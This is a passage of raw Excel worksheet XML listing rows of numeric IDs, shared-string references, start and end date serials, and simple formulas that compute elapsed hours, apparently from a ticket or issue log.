        <v>4590</v>
      </c>
      <c r="D1775" t="s">
        <v>7</v>
      </c>
      <c r="E1775" s="1">
        <v>43252.812222222223</v>
      </c>
      <c r="F1775" s="1">
        <v>43254.898113425923</v>
      </c>
      <c r="G1775" t="s">
        <v>16</v>
      </c>
      <c r="H1775" t="str">
        <f>TEXT(F1775-E1775,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="1776" spans="1:8" hidden="1">
      <c r="B1776">
        <v>11222</v>
      </c>
      <c r="C1776" t="s">
        <v>4591</v>
      </c>
      <c r="D1776" t="s">
        <v>7</v>
      </c>
      <c r="E1776" s="1">
        <v>43252.683032407411</v>
      </c>
      <c r="F1776" s="1">
        <v>43260.633252314816</v>
      </c>
      <c r="G1776" t="s">
        <v>51</v>
      </c>
      <c r="H1776" t="str">
        <f>TEXT(F1776-E1776,"[h]")</f>
        <v>190</v>
      </c>
    </row>
    <row r="1777" spans="1:8">
      <c r="A1777" t="s">
        <v>4592</v>
      </c>
      <c r="B1777">
        <v>11218</v>
      </c>
      <c r="C1777" t="s">
        <v>4593</v>
      </c>
      <c r="D1777" t="s">
        <v>7</v>
      </c>
      <c r="E1777" s="1">
        <v>43252.076099537036</v>
      </c>
      <c r="F1777" s="1">
        <v>43253.076597222222</v>
      </c>
      <c r="G1777" t="s">
        <v>16</v>
      </c>
      <c r="H1777" t="str">
        <f>TEXT(F1777-E1777,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="1778" spans="1:8">
      <c r="A1778" t="s">
        <v>4594</v>
      </c>
      <c r="B1778">
        <v>11217</v>
      </c>
      <c r="C1778" t="s">
        <v>4595</v>
      </c>
      <c r="D1778" t="s">
        <v>7</v>
      </c>
      <c r="E1778" s="1">
        <v>43251.884942129633</v>
      </c>
      <c r="F1778" s="1">
        <v>43254.743715277778</v>
      </c>
      <c r="G1778" t="s">
        <v>31</v>
      </c>
      <c r="H1778" t="str">
        <f>TEXT(F1778-E1778,"[h]")</f>
        <v>68</v>
      </c>
    </row>
    <row r="1779" spans="1:8" hidden="1">
      <c r="A1779" t="s">
        <v>4596</v>
      </c>
      <c r="B1779">
        <v>11215</v>
      </c>
      <c r="C1779" t="s">
        <v>4597</v>
      </c>
      <c r="D1779" t="s">
        <v>7</v>
      </c>
      <c r="E1779" s="1">
        <v>43251.858634259261</v>
      </c>
      <c r="F1779" s="1">
        <v>43251.879826388889</v>
      </c>
      <c r="G1779" t="s">
        <v>4598</v>
      </c>
      <c r="H1779" t="str">
        <f>TEXT(F1779-E1779,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1780" spans="1:8" hidden="1">
      <c r="A1780" t="s">
        <v>4601</v>
      </c>
      <c r="B1780">
        <v>11209</v>
      </c>
      <c r="C1780" t="s">
        <v>4602</v>
      </c>
      <c r="D1780" t="s">
        <v>7</v>
      </c>
      <c r="E1780" s="1">
        <v>43251.467164351852</v>
      </c>
      <c r="F1780" s="1">
        <v>43254.567384259259</v>
      </c>
      <c r="G1780" t="s">
        <v>66</v>
      </c>
      <c r="H1780" t="str">
        <f>TEXT(F1780-E1780,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="1781" spans="1:8" hidden="1">
      <c r="A1781" t="s">
        <v>4603</v>
      </c>
      <c r="B1781">
        <v>11206</v>
      </c>
      <c r="C1781" t="s">
        <v>4604</v>
      </c>
      <c r="D1781" t="s">
        <v>7</v>
      </c>
      <c r="E1781" s="1">
        <v>43251.195300925923</v>
      </c>
      <c r="F1781" s="1">
        <v>43251.262974537036</v>
      </c>
      <c r="G1781" t="s">
        <v>66</v>
      </c>
      <c r="H1781" t="str">
        <f>TEXT(F1781-E1781,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1782" spans="1:8">
      <c r="A1782" t="s">
        <v>4605</v>
      </c>
      <c r="B1782">
        <v>11205</v>
      </c>
      <c r="C1782" t="s">
        <v>4606</v>
      </c>
      <c r="D1782" t="s">
        <v>7</v>
      </c>
      <c r="E1782" s="1">
        <v>43251.167222222219</v>
      </c>
      <c r="F1782" s="1">
        <v>43628.616736111115</v>
      </c>
      <c r="G1782" t="s">
        <v>25</v>
      </c>
      <c r="H1782" t="str">
        <f>TEXT(F1782-E1782,"[h]")</f>
        <v>9058</v>
      </c>
    </row>
    <row r="1783" spans="1:8">
      <c r="A1783" t="s">
        <v>4607</v>
      </c>
      <c r="B1783">
        <v>11200</v>
      </c>
      <c r="C1783" t="s">
        <v>4608</v>
      </c>
      <c r="D1783" t="s">
        <v>7</v>
      </c>
      <c r="E1783" s="1">
        <v>43250.782604166663</v>
      </c>
      <c r="F1783" s="1">
        <v>43251.036157407405</v>
      </c>
      <c r="G1783" t="s">
        <v>22</v>
      </c>
      <c r="H1783" t="str">
        <f>TEXT(F1783-E1783,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1784" spans="1:8">
      <c r="A1784" t="s">
        <v>4611</v>
      </c>
      <c r="B1784">
        <v>11198</v>
      </c>
      <c r="C1784" t="s">
        <v>15</v>
      </c>
      <c r="D1784" t="s">
        <v>7</v>
      </c>
      <c r="E1784" s="1">
        <v>43250.573113425926</v>
      </c>
      <c r="F1784" s="1">
        <v>43250.605451388888</v>
      </c>
      <c r="G1784" t="s">
        <v>98</v>
      </c>
      <c r="H1784" t="str">
        <f>TEXT(F1784-E1784,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1785" spans="1:8">
      <c r="A1785" t="s">
        <v>4612</v>
      </c>
      <c r="B1785">
        <v>11197</v>
      </c>
      <c r="C1785" t="s">
        <v>4613</v>
      </c>
      <c r="D1785" t="s">
        <v>7</v>
      </c>
      <c r="E1785" s="1">
        <v>43250.497986111113</v>
      </c>
      <c r="F1785" s="1">
        <v>43431.624756944446</v>
      </c>
      <c r="G1785" t="s">
        <v>4614</v>
      </c>
      <c r="H1785" t="str">
        <f>TEXT(F1785-E1785,"[h]")</f>
        <v>4347</v>
      </c>
    </row>
    <row r="1786" spans="1:8" hidden="1">
      <c r="A1786" t="s">
        <v>4615</v>
      </c>
      <c r="B1786">
        <v>11195</v>
      </c>
      <c r="C1786" t="s">
        <v>4616</v>
      </c>
      <c r="D1786" t="s">
        <v>7</v>
      </c>
      <c r="E1786" s="1">
        <v>43250.422546296293</v>
      </c>
      <c r="F1786" s="1">
        <v>43509.39675925926</v>
      </c>
      <c r="G1786" t="s">
        <v>2687</v>
      </c>
      <c r="H1786" t="str">
        <f>TEXT(F1786-E1786,"[h]")</f>
        <v>6215</v>
      </c>
    </row>
    <row r="1787" spans="1:8">
      <c r="A1787" t="s">
        <v>4617</v>
      </c>
      <c r="B1787">
        <v>11194</v>
      </c>
      <c r="C1787" t="s">
        <v>4618</v>
      </c>
      <c r="D1787" t="s">
        <v>7</v>
      </c>
      <c r="E1787" s="1">
        <v>43250.106909722221</v>
      </c>
      <c r="F1787" s="1">
        <v>43250.187291666669</v>
      </c>
      <c r="G1787" t="s">
        <v>98</v>
      </c>
      <c r="H1787" t="str">
        <f>TEXT(F1787-E1787,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1788" spans="1:8">
      <c r="A1788" t="s">
        <v>4599</v>
      </c>
      <c r="B1788">
        <v>11193</v>
      </c>
      <c r="C1788" t="s">
        <v>4600</v>
      </c>
      <c r="D1788" t="s">
        <v>7</v>
      </c>
      <c r="E1788" s="1">
        <v>43250.087488425925</v>
      </c>
      <c r="F1788" s="1">
        <v>43251.264189814814</v>
      </c>
      <c r="G1788" t="s">
        <v>16</v>
      </c>
      <c r="H1788" t="str">
        <f>TEXT(F1788-E1788,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="1789" spans="1:8" hidden="1">
      <c r="A1789" t="s">
        <v>4619</v>
      </c>
      <c r="B1789">
        <v>11191</v>
      </c>
      <c r="C1789" t="s">
        <v>4620</v>
      </c>
      <c r="D1789" t="s">
        <v>7</v>
      </c>
      <c r="E1789" s="1">
        <v>43249.991597222222</v>
      </c>
      <c r="F1789" s="1">
        <v>43253.702372685184</v>
      </c>
      <c r="G1789" t="s">
        <v>4621</v>
      </c>
      <c r="H1789" t="str">
        <f>TEXT(F1789-E1789,"[h]")</f>
        <v>89</v>
      </c>
    </row>
    <row r="1790" spans="1:8" hidden="1">
      <c r="A1790" t="s">
        <v>4622</v>
      </c>
      <c r="B1790">
        <v>11190</v>
      </c>
      <c r="C1790" t="s">
        <v>4623</v>
      </c>
      <c r="D1790" t="s">
        <v>7</v>
      </c>
      <c r="E1790" s="1">
        <v>43249.755567129629</v>
      </c>
      <c r="F1790" s="1">
        <v>43249.944895833331</v>
      </c>
      <c r="G1790" t="s">
        <v>66</v>
      </c>
      <c r="H1790" t="str">
        <f>TEXT(F1790-E1790,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1791" spans="1:8" hidden="1">
      <c r="A1791" t="s">
        <v>4624</v>
      </c>
      <c r="B1791">
        <v>11189</v>
      </c>
      <c r="C1791" t="s">
        <v>4625</v>
      </c>
      <c r="D1791" t="s">
        <v>7</v>
      </c>
      <c r="E1791" s="1">
        <v>43249.633668981478</v>
      </c>
      <c r="F1791" s="1">
        <v>43252.868194444447</v>
      </c>
      <c r="G1791" t="s">
        <v>4626</v>
      </c>
      <c r="H1791" t="str">
        <f>TEXT(F1791-E1791,"[h]")</f>
        <v>77</v>
      </c>
    </row>
    <row r="1792" spans="1:8" hidden="1">
      <c r="A1792" t="s">
        <v>4627</v>
      </c>
      <c r="B1792">
        <v>11187</v>
      </c>
      <c r="C1792" t="s">
        <v>4628</v>
      </c>
      <c r="D1792" t="s">
        <v>7</v>
      </c>
      <c r="E1792" s="1">
        <v>43249.336365740739</v>
      </c>
      <c r="F1792" s="1">
        <v>43249.563356481478</v>
      </c>
      <c r="G1792" t="s">
        <v>28</v>
      </c>
      <c r="H1792" t="str">
        <f>TEXT(F1792-E1792,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1793" spans="1:8" hidden="1">
      <c r="A1793" t="s">
        <v>4629</v>
      </c>
      <c r="B1793">
        <v>11186</v>
      </c>
      <c r="C1793" t="s">
        <v>4630</v>
      </c>
      <c r="D1793" t="s">
        <v>7</v>
      </c>
      <c r="E1793" s="1">
        <v>43249.290092592593</v>
      </c>
      <c r="F1793" s="1">
        <v>43249.804386574076</v>
      </c>
      <c r="G1793" t="s">
        <v>55</v>
      </c>
      <c r="H1793" t="str">
        <f>TEXT(F1793-E1793,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="1794" spans="1:8" hidden="1">
      <c r="A1794" t="s">
        <v>4631</v>
      </c>
      <c r="B1794">
        <v>11185</v>
      </c>
      <c r="C1794" t="s">
        <v>4632</v>
      </c>
      <c r="D1794" t="s">
        <v>7</v>
      </c>
      <c r="E1794" s="1">
        <v>43249.280682870369</v>
      </c>
      <c r="F1794" s="1">
        <v>43249.802511574075</v>
      </c>
      <c r="G1794" t="s">
        <v>174</v>
      </c>
      <c r="H1794" t="str">
        <f>TEXT(F1794-E1794,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="1795" spans="1:8" hidden="1">
      <c r="A1795" t="s">
        <v>4633</v>
      </c>
      <c r="B1795">
        <v>11184</v>
      </c>
      <c r="C1795" t="s">
        <v>4634</v>
      </c>
      <c r="D1795" t="s">
        <v>7</v>
      </c>
      <c r="E1795" s="1">
        <v>43249.276805555557</v>
      </c>
      <c r="F1795" s="1">
        <v>43249.925671296296</v>
      </c>
      <c r="G1795" t="s">
        <v>174</v>
      </c>
      <c r="H1795" t="str">
        <f>TEXT(F1795-E1795,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1796" spans="1:8">
      <c r="A1796" t="s">
        <v>4635</v>
      </c>
      <c r="B1796">
        <v>11182</v>
      </c>
      <c r="C1796" t="s">
        <v>4636</v>
      </c>
      <c r="D1796" t="s">
        <v>7</v>
      </c>
      <c r="E1796" s="1">
        <v>43249.235706018517</v>
      </c>
      <c r="F1796" s="1">
        <v>43249.616620370369</v>
      </c>
      <c r="G1796" t="s">
        <v>25</v>
      </c>
      <c r="H1796" t="str">
        <f>TEXT(F1796-E1796,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1797" spans="1:8">
      <c r="A1797" t="s">
        <v>4637</v>
      </c>
      <c r="B1797">
        <v>11180</v>
      </c>
      <c r="C1797" t="s">
        <v>4638</v>
      </c>
      <c r="D1797" t="s">
        <v>7</v>
      </c>
      <c r="E1797" s="1">
        <v>43248.937303240738</v>
      </c>
      <c r="F1797" s="1">
        <v>43249.056562500002</v>
      </c>
      <c r="G1797" t="s">
        <v>16</v>
      </c>
      <c r="H1797" t="str">
        <f>TEXT(F1797-E1797,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1798" spans="1:8" hidden="1">
      <c r="A1798" t="s">
        <v>4639</v>
      </c>
      <c r="B1798">
        <v>11179</v>
      </c>
      <c r="C1798" t="s">
        <v>4640</v>
      </c>
      <c r="D1798" t="s">
        <v>7</v>
      </c>
      <c r="E1798" s="1">
        <v>43248.78638888889</v>
      </c>
      <c r="F1798" s="1">
        <v>43298.768599537034</v>
      </c>
      <c r="G1798" t="s">
        <v>4641</v>
      </c>
      <c r="H1798" t="str">
        <f>TEXT(F1798-E1798,"[h]")</f>
        <v>1199</v>
      </c>
    </row>
    <row r="1799" spans="1:8" hidden="1">
      <c r="A1799" t="s">
        <v>4642</v>
      </c>
      <c r="B1799">
        <v>11178</v>
      </c>
      <c r="C1799" t="s">
        <v>4643</v>
      </c>
      <c r="D1799" t="s">
        <v>7</v>
      </c>
      <c r="E1799" s="1">
        <v>43248.59815972222</v>
      </c>
      <c r="F1799" s="1">
        <v>43249.221261574072</v>
      </c>
      <c r="G1799" t="s">
        <v>1681</v>
      </c>
      <c r="H1799" t="str">
        <f>TEXT(F1799-E1799,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1800" spans="1:8" hidden="1">
      <c r="A1800" t="s">
        <v>4644</v>
      </c>
      <c r="B1800">
        <v>11177</v>
      </c>
      <c r="C1800" t="s">
        <v>4645</v>
      </c>
      <c r="D1800" t="s">
        <v>7</v>
      </c>
      <c r="E1800" s="1">
        <v>43248.568796296298</v>
      </c>
      <c r="F1800" s="1">
        <v>43249.686273148145</v>
      </c>
      <c r="G1800" t="s">
        <v>66</v>
      </c>
      <c r="H1800" t="str">
        <f>TEXT(F1800-E1800,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="1801" spans="1:8" hidden="1">
      <c r="A1801" t="s">
        <v>4646</v>
      </c>
      <c r="B1801">
        <v>11176</v>
      </c>
      <c r="C1801" t="s">
        <v>4647</v>
      </c>
      <c r="D1801" t="s">
        <v>7</v>
      </c>
      <c r="E1801" s="1">
        <v>43248.531550925924</v>
      </c>
      <c r="F1801" s="1">
        <v>43250.781863425924</v>
      </c>
      <c r="G1801" t="s">
        <v>28</v>
      </c>
      <c r="H1801" t="str">
        <f>TEXT(F1801-E1801,"[h]")</f>
        <v>54</v>
      </c>
    </row>
    <row r="1802" spans="1:8" hidden="1">
      <c r="A1802" t="s">
        <v>4648</v>
      </c>
      <c r="B1802">
        <v>11175</v>
      </c>
      <c r="C1802" t="s">
        <v>4649</v>
      </c>
      <c r="D1802" t="s">
        <v>7</v>
      </c>
      <c r="E1802" s="1">
        <v>43248.039317129631</v>
      </c>
      <c r="F1802" s="1">
        <v>43392.354259259257</v>
      </c>
      <c r="G1802" t="s">
        <v>4641</v>
      </c>
      <c r="H1802" t="str">
        <f>TEXT(F1802-E1802,"[h]")</f>
        <v>3463</v>
      </c>
    </row>
    <row r="1803" spans="1:8" hidden="1">
      <c r="A1803" t="s">
        <v>4653</v>
      </c>
      <c r="B1803">
        <v>11173</v>
      </c>
      <c r="C1803" t="s">
        <v>4654</v>
      </c>
      <c r="D1803" t="s">
        <v>7</v>
      </c>
      <c r="E1803" s="1">
        <v>43247.788599537038</v>
      </c>
      <c r="F1803" s="1">
        <v>43250.780729166669</v>
      </c>
      <c r="G1803" t="s">
        <v>28</v>
      </c>
      <c r="H1803" t="str">
        <f>TEXT(F1803-E1803,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1804" spans="1:8" hidden="1">
      <c r="A1804" t="s">
        <v>4655</v>
      </c>
      <c r="B1804">
        <v>11171</v>
      </c>
      <c r="C1804" t="s">
        <v>4656</v>
      </c>
      <c r="D1804" t="s">
        <v>7</v>
      </c>
      <c r="E1804" s="1">
        <v>43247.732685185183</v>
      </c>
      <c r="F1804" s="1">
        <v>43510.092638888891</v>
      </c>
      <c r="G1804" t="s">
        <v>2978</v>
      </c>
      <c r="H1804" t="str">
        <f>TEXT(F1804-E1804,"[h]")</f>
        <v>6296</v>
      </c>
    </row>
    <row r="1805" spans="1:8" hidden="1">
      <c r="A1805" t="s">
        <v>4650</v>
      </c>
      <c r="B1805">
        <v>11169</v>
      </c>
      <c r="C1805" t="s">
        <v>4651</v>
      </c>
      <c r="D1805" t="s">
        <v>7</v>
      </c>
      <c r="E1805" s="1">
        <v>43247.711192129631</v>
      </c>
      <c r="F1805" s="1">
        <v>43247.775671296295</v>
      </c>
      <c r="G1805" t="s">
        <v>4652</v>
      </c>
      <c r="H1805" t="str">
        <f>TEXT(F1805-E1805,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1806" spans="1:8" hidden="1">
      <c r="A1806" t="s">
        <v>4657</v>
      </c>
      <c r="B1806">
        <v>11168</v>
      </c>
      <c r="C1806" t="s">
        <v>4658</v>
      </c>
      <c r="D1806" t="s">
        <v>7</v>
      </c>
      <c r="E1806" s="1">
        <v>43247.627488425926</v>
      </c>
      <c r="F1806" s="1">
        <v>43247.702650462961</v>
      </c>
      <c r="G1806" t="s">
        <v>4652</v>
      </c>
      <c r="H1806" t="str">
        <f>TEXT(F1806-E1806,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1807" spans="1:8" hidden="1">
      <c r="A1807" t="s">
        <v>4659</v>
      </c>
      <c r="B1807">
        <v>11167</v>
      </c>
      <c r="C1807" t="s">
        <v>4660</v>
      </c>
      <c r="D1807" t="s">
        <v>7</v>
      </c>
      <c r="E1807" s="1">
        <v>43247.243587962963</v>
      </c>
      <c r="F1807" s="1">
        <v>43256.964872685188</v>
      </c>
      <c r="G1807" t="s">
        <v>28</v>
      </c>
      <c r="H1807" t="str">
        <f>TEXT(F1807-E1807,"[h]")</f>
        <v>233</v>
      </c>
    </row>
    <row r="1808" spans="1:8" hidden="1">
      <c r="A1808" t="s">
        <v>4661</v>
      </c>
      <c r="B1808">
        <v>11166</v>
      </c>
      <c r="C1808" t="s">
        <v>4662</v>
      </c>
      <c r="D1808" t="s">
        <v>7</v>
      </c>
      <c r="E1808" s="1">
        <v>43246.966261574074</v>
      </c>
      <c r="F1808" s="1">
        <v>43247.819641203707</v>
      </c>
      <c r="G1808" t="s">
        <v>251</v>
      </c>
      <c r="H1808" t="str">
        <f>TEXT(F1808-E1808,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1809" spans="1:8" hidden="1">
      <c r="A1809" t="s">
        <v>4663</v>
      </c>
      <c r="B1809">
        <v>11165</v>
      </c>
      <c r="C1809" t="s">
        <v>4664</v>
      </c>
      <c r="D1809" t="s">
        <v>7</v>
      </c>
      <c r="E1809" s="1">
        <v>43246.901643518519</v>
      </c>
      <c r="F1809" s="1">
        <v>43248.045335648145</v>
      </c>
      <c r="G1809" t="s">
        <v>4665</v>
      </c>
      <c r="H1809" t="str">
        <f>TEXT(F1809-E1809,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="1810" spans="1:8" hidden="1">
      <c r="A1810" t="s">
        <v>4666</v>
      </c>
      <c r="B1810">
        <v>11160</v>
      </c>
      <c r="C1810" t="s">
        <v>4667</v>
      </c>
      <c r="D1810" t="s">
        <v>7</v>
      </c>
      <c r="E1810" s="1">
        <v>43245.108518518522</v>
      </c>
      <c r="F1810" s="1">
        <v>43245.684930555559</v>
      </c>
      <c r="G1810" t="s">
        <v>55</v>
      </c>
      <c r="H1810" t="str">
        <f>TEXT(F1810-E1810,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="1811" spans="1:8" hidden="1">
      <c r="A1811" t="s">
        <v>4668</v>
      </c>
      <c r="B1811">
        <v>11159</v>
      </c>
      <c r="C1811" t="s">
        <v>4669</v>
      </c>
      <c r="D1811" t="s">
        <v>7</v>
      </c>
      <c r="E1811" s="1">
        <v>43245.034930555557</v>
      </c>
      <c r="F1811" s="1">
        <v>43245.881018518521</v>
      </c>
      <c r="G1811" t="s">
        <v>103</v>
      </c>
      <c r="H1811" t="str">
        <f>TEXT(F1811-E1811,"[h]")</f>
        <v>20</v>
      </c>
    </row>
    <row r="1812" spans="1:8">
      <c r="A1812" t="s">
        <v>4670</v>
      </c>
      <c r="B1812">
        <v>11158</v>
      </c>
      <c r="C1812" t="s">
        <v>4671</v>
      </c>
      <c r="D1812" t="s">
        <v>7</v>
      </c>
      <c r="E1812" s="1">
        <v>43245.005636574075</v>
      </c>
      <c r="F1812" s="1">
        <v>43245.037523148145</v>
      </c>
      <c r="G1812" t="s">
        <v>1456</v>
      </c>
      <c r="H1812" t="str">
        <f>TEXT(F1812-E1812,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1813" spans="1:8" hidden="1">
      <c r="A1813" t="s">
        <v>4672</v>
      </c>
      <c r="B1813">
        <v>11157</v>
      </c>
      <c r="C1813" t="s">
        <v>4673</v>
      </c>
      <c r="D1813" t="s">
        <v>7</v>
      </c>
      <c r="E1813" s="1">
        <v>43244.821817129632</v>
      </c>
      <c r="F1813" s="1">
        <v>43245.213333333333</v>
      </c>
      <c r="G1813" t="s">
        <v>4674</v>
      </c>
      <c r="H1813" t="str">
        <f>TEXT(F1813-E1813,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1814" spans="1:8">
      <c r="A1814" t="s">
        <v>4675</v>
      </c>
      <c r="B1814">
        <v>11155</v>
      </c>
      <c r="C1814" t="s">
        <v>4676</v>
      </c>
      <c r="D1814" t="s">
        <v>7</v>
      </c>
      <c r="E1814" s="1">
        <v>43244.33792824074</v>
      </c>
      <c r="F1814" s="1">
        <v>43259.655763888892</v>
      </c>
      <c r="G1814" t="s">
        <v>16</v>
      </c>
      <c r="H1814" t="str">
        <f>TEXT(F1814-E1814,"[h]")</f>
        <v>367</v>
      </c>
    </row>
    <row r="1815" spans="1:8">
      <c r="A1815" t="s">
        <v>4677</v>
      </c>
      <c r="B1815">
        <v>11154</v>
      </c>
      <c r="C1815" t="s">
        <v>4678</v>
      </c>
      <c r="D1815" t="s">
        <v>7</v>
      </c>
      <c r="E1815" s="1">
        <v>43244.326053240744</v>
      </c>
      <c r="F1815" s="1">
        <v>43259.655763888892</v>
      </c>
      <c r="G1815" t="s">
        <v>25</v>
      </c>
      <c r="H1815" t="str">
        <f>TEXT(F1815-E1815,"[h]")</f>
        <v>367</v>
      </c>
    </row>
    <row r="1816" spans="1:8" hidden="1">
      <c r="A1816" t="s">
        <v>4679</v>
      </c>
      <c r="B1816">
        <v>11153</v>
      </c>
      <c r="C1816" t="s">
        <v>4680</v>
      </c>
      <c r="D1816" t="s">
        <v>7</v>
      </c>
      <c r="E1816" s="1">
        <v>43244.279374999998</v>
      </c>
      <c r="F1816" s="1">
        <v>43244.298159722224</v>
      </c>
      <c r="G1816" t="s">
        <v>66</v>
      </c>
      <c r="H1816" t="str">
        <f>TEXT(F1816-E1816,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1817" spans="1:8">
      <c r="A1817" t="s">
        <v>4681</v>
      </c>
      <c r="B1817">
        <v>11151</v>
      </c>
      <c r="C1817" t="s">
        <v>4682</v>
      </c>
      <c r="D1817" t="s">
        <v>7</v>
      </c>
      <c r="E1817" s="1">
        <v>43244.243287037039</v>
      </c>
      <c r="F1817" s="1">
        <v>43343.855891203704</v>
      </c>
      <c r="G1817" t="s">
        <v>16</v>
      </c>
      <c r="H1817" t="str">
        <f>TEXT(F1817-E1817,"[h]")</f>
        <v>2390</v>
      </c>
    </row>
    <row r="1818" spans="1:8">
      <c r="A1818" t="s">
        <v>4683</v>
      </c>
      <c r="B1818">
        <v>11149</v>
      </c>
      <c r="C1818" t="s">
        <v>4684</v>
      </c>
      <c r="D1818" t="s">
        <v>7</v>
      </c>
      <c r="E1818" s="1">
        <v>43243.962060185186</v>
      </c>
      <c r="F1818" s="1">
        <v>43245.192743055559</v>
      </c>
      <c r="G1818" t="s">
        <v>16</v>
      </c>
      <c r="H1818" t="str">
        <f>TEXT(F1818-E1818,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="1819" spans="1:8" hidden="1">
      <c r="A1819" t="s">
        <v>4685</v>
      </c>
      <c r="B1819">
        <v>11148</v>
      </c>
      <c r="C1819" t="s">
        <v>4686</v>
      </c>
      <c r="D1819" t="s">
        <v>7</v>
      </c>
      <c r="E1819" s="1">
        <v>43243.926180555558</v>
      </c>
      <c r="F1819" s="1">
        <v>43251.264513888891</v>
      </c>
      <c r="G1819" t="s">
        <v>55</v>
      </c>
      <c r="H1819" t="str">
        <f>TEXT(F1819-E1819,"[h]")</f>
        <v>176</v>
      </c>
    </row>
    <row r="1820" spans="1:8" hidden="1">
      <c r="A1820" t="s">
        <v>4687</v>
      </c>
      <c r="B1820">
        <v>11147</v>
      </c>
      <c r="C1820" t="s">
        <v>4688</v>
      </c>
      <c r="D1820" t="s">
        <v>7</v>
      </c>
      <c r="E1820" s="1">
        <v>43243.914675925924</v>
      </c>
      <c r="F1820" s="1">
        <v>43581.009340277778</v>
      </c>
      <c r="G1820" t="s">
        <v>4689</v>
      </c>
      <c r="H1820" t="str">
        <f>TEXT(F1820-E1820,"[h]")</f>
        <v>8090</v>
      </c>
    </row>
    <row r="1821" spans="1:8" hidden="1">
      <c r="A1821" t="s">
        <v>4690</v>
      </c>
      <c r="B1821">
        <v>11146</v>
      </c>
      <c r="C1821" t="s">
        <v>4691</v>
      </c>
      <c r="D1821" t="s">
        <v>7</v>
      </c>
      <c r="E1821" s="1">
        <v>43243.789340277777</v>
      </c>
      <c r="F1821" s="1">
        <v>43253.690289351849</v>
      </c>
      <c r="G1821" t="s">
        <v>4692</v>
      </c>
      <c r="H1821" t="str">
        <f>TEXT(F1821-E1821,"[h]")</f>
        <v>237</v>
      </c>
    </row>
    <row r="1822" spans="1:8" hidden="1">
      <c r="A1822" t="s">
        <v>4693</v>
      </c>
      <c r="B1822">
        <v>11145</v>
      </c>
      <c r="C1822" t="s">
        <v>4694</v>
      </c>
      <c r="D1822" t="s">
        <v>7</v>
      </c>
      <c r="E1822" s="1">
        <v>43243.784108796295</v>
      </c>
      <c r="F1822" s="1">
        <v>43247.795636574076</v>
      </c>
      <c r="G1822" t="s">
        <v>4695</v>
      </c>
      <c r="H1822" t="str">
        <f>TEXT(F1822-E1822,"[h]")</f>
        <v>96</v>
      </c>
    </row>
    <row r="1823" spans="1:8" hidden="1">
      <c r="A1823" t="s">
        <v>4696</v>
      </c>
      <c r="B1823">
        <v>11143</v>
      </c>
      <c r="C1823" t="s">
        <v>4697</v>
      </c>
      <c r="D1823" t="s">
        <v>7</v>
      </c>
      <c r="E1823" s="1">
        <v>43243.592569444445</v>
      </c>
      <c r="F1823" s="1">
        <v>43296.153078703705</v>
      </c>
      <c r="G1823" t="s">
        <v>51</v>
      </c>
      <c r="H1823" t="str">
        <f>TEXT(F1823-E1823,"[h]")</f>
        <v>1261</v>
      </c>
    </row>
    <row r="1824" spans="1:8" hidden="1">
      <c r="A1824" t="s">
        <v>4698</v>
      </c>
      <c r="B1824">
        <v>11142</v>
      </c>
      <c r="C1824" t="s">
        <v>4699</v>
      </c>
      <c r="D1824" t="s">
        <v>7</v>
      </c>
      <c r="E1824" s="1">
        <v>43243.362951388888</v>
      </c>
      <c r="F1824" s="1">
        <v>43296.149236111109</v>
      </c>
      <c r="G1824" t="s">
        <v>66</v>
      </c>
      <c r="H1824" t="str">
        <f>TEXT(F1824-E1824,"[h]")</f>
        <v>1266</v>
      </c>
    </row>
    <row r="1825" spans="1:8" hidden="1">
      <c r="A1825" t="s">
        <v>4700</v>
      </c>
      <c r="B1825">
        <v>11141</v>
      </c>
      <c r="C1825" t="s">
        <v>4701</v>
      </c>
      <c r="D1825" t="s">
        <v>7</v>
      </c>
      <c r="E1825" s="1">
        <v>43243.142361111109</v>
      </c>
      <c r="F1825" s="1">
        <v>43243.574664351851</v>
      </c>
      <c r="G1825" t="s">
        <v>43</v>
      </c>
      <c r="H1825" t="str">
        <f>TEXT(F1825-E1825,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1826" spans="1:8" hidden="1">
      <c r="A1826" t="s">
        <v>4702</v>
      </c>
      <c r="B1826">
        <v>11140</v>
      </c>
      <c r="C1826" t="s">
        <v>4703</v>
      </c>
      <c r="D1826" t="s">
        <v>7</v>
      </c>
      <c r="E1826" s="1">
        <v>43242.931064814817</v>
      </c>
      <c r="F1826" s="1">
        <v>43249.227025462962</v>
      </c>
      <c r="G1826" t="s">
        <v>95</v>
      </c>
      <c r="H1826" t="str">
        <f>TEXT(F1826-E1826,"[h]")</f>
        <v>151</v>
      </c>
    </row>
    <row r="1827" spans="1:8" hidden="1">
      <c r="A1827" t="s">
        <v>4704</v>
      </c>
      <c r="B1827">
        <v>11139</v>
      </c>
      <c r="C1827" t="s">
        <v>4705</v>
      </c>
      <c r="D1827" t="s">
        <v>7</v>
      </c>
      <c r="E1827" s="1">
        <v>43242.880358796298</v>
      </c>
      <c r="F1827" s="1">
        <v>43243.570196759261</v>
      </c>
